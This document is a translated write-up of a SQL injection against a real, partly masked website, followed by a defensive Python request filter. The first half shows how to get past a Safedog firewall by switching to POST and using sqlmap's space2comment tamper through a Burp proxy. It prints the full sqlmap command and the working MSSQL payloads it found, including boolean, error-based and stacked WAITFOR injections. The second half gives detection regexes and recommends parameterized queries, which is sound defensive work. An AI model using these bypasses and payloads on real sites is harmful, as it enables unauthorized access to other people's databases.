Notes on an SQL injection
Target: https://www.xxxx.com/
I submitted this injection to Butian (补天) earlier; it was later apparently "fixed" (in practice they installed Safedog (安全狗) and filtered a few keywords).
But I tried again today and it is still injectable.
You can see that Safedog now blocks the injection characters when they are sent via GET.
The target site is pseudo-static with rewritten URLs, so just change how the request is submitted.
Switch to a POST submission (by default Safedog only intercepts GET).
The page accepts POST parameters; testing showed that some spaces and sensitive characters are still blocked.
Run sqlmap against it directly, paying attention to the thread count and spoofing the HTTP headers.
Since the target site is HTTPS, I added the --force-ssl option to force HTTPS, but it reported an HTTPS connection error.
Because sqlmap cannot ignore the HTTPS certificate, there are two workarounds:
- Access the target through a local proxy port
- Set up a web server and inject through a proxy file
The first is simple and involves no code: have Burp Suite listen as a proxy on local port 8080, then point sqlmap at port 8080 for the injection (other local proxies such as Charles also work, of course).
-u https://www.xxx.com/news_show.asp --data=id=3395 --safe-url=https://www.xxxx.com/news_show.asp?/3395.html --safe-freq=2 --tamper space2comment.py --force-ssl --proxy http://127.0.0.1:8080 --random-agent -v 3
Result:
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3395 AND 1967=1967
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: id=3395 AND 8669 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8669=8669) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)))
    Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6806=6806) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113))
    Vector: (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=3395;WAITFOR DELAY '0:0:5'--
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: id=3395 WAITFOR DELAY '0:0:5'--
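The defensive lesson in this writeup is that a filter which inspects only the query string, or only literal keywords separated by spaces, misses the very same payload once it arrives in a POST body or with its spaces replaced by inline comments (the space2comment tamper used above). The following is an added example, not code from the original post or from the Safedog product, of request-inspection logic that collects parameters from both the query string and the form body, normalizes them, and matches the MSSQL payload classes sqlmap reported above. The sample requests, the path /news_show.asp and the parameter values are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample requests as (method, request-target, body). They mirror the
# payload classes in the sqlmap output above; none of them comes from the original
# post, and the path /news_show.asp and the bodies are assumptions for this example.
SAMPLE_REQUESTS = [
    ("GET",  "/news_show.asp?id=3395", ""),                                            # benign
    ("GET",  "/news_show.asp?id=3395%20AND%201967%3D1967", ""),                        # boolean-based, GET
    ("POST", "/news_show.asp", "id=3395+AND+1967%3D1967"),                             # same payload, POST
    ("POST", "/news_show.asp", "id=3395%3BWAITFOR/**/DELAY/**/%270%3A0%3A5%27--"),     # stacked + space2comment
    ("POST", "/news_show.asp", "id=%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%29"),  # CHAR() concat
    ("POST", "/news_show.asp", "id=3395&title=Annual+report+2014"),                    # benign
]

# One regex per MSSQL payload class seen in the sqlmap output.
SIGNATURES = {
    "tautology":     re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "char_concat":   re.compile(r"CHAR\s*\(\s*\d+\s*\)\s*\+\s*CHAR\s*\(", re.I),
    "time_delay":    re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked_query": re.compile(r";\s*(IF|WAITFOR|SELECT|EXEC|DECLARE)\b", re.I),
}

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def parse_form(data: str) -> dict:
    """Parse application/x-www-form-urlencoded data, splitting on '&' only,
    so a ';' inside a value (a stacked query) stays part of that value."""
    params: dict = {}
    for pair in data.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def normalize(value: str) -> str:
    """Replace inline comments with a space (undoing the space2comment
    substitution) and collapse runs of whitespace before matching."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).strip()


def extract_params(method: str, target: str, body: str) -> dict:
    """Collect parameters from the query string AND the POST body; a filter
    that only looks at GET is exactly what the writeup above walks around."""
    params = parse_form(urlsplit(target).query)
    if method.upper() == "POST" and body:
        for key, values in parse_form(body).items():
            params.setdefault(key, []).extend(values)
    return params


def inspect_request(method: str, target: str, body: str) -> list:
    """Return (parameter, signature) hits for one request."""
    hits = []
    for name, values in extract_params(method, target, body).items():
        for raw in values:
            decoded = normalize(raw)
            for sig, rx in SIGNATURES.items():
                if rx.search(decoded):
                    hits.append((name, sig))
    return hits


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Inspect every request; returns [(method, hits), ...] in input order."""
    return [(m, inspect_request(m, t, b)) for m, t, b in requests]


if __name__ == "__main__":
    for (method, target, body), (_, hits) in zip(SAMPLE_REQUESTS, scan()):
        verdict = "BLOCK" if hits else "allow"
        print(f"{verdict:5} {method:4} {target} {body!r} {hits}")
```

Running it flags the GET and POST variants of the boolean payload identically, and the comment-obfuscated WAITFOR body is caught after normalization while the benign requests pass. Pattern matching of this kind is a compensating control only; the durable fix for news_show.asp is a parameterized query for the id parameter, which no request filter can substitute for.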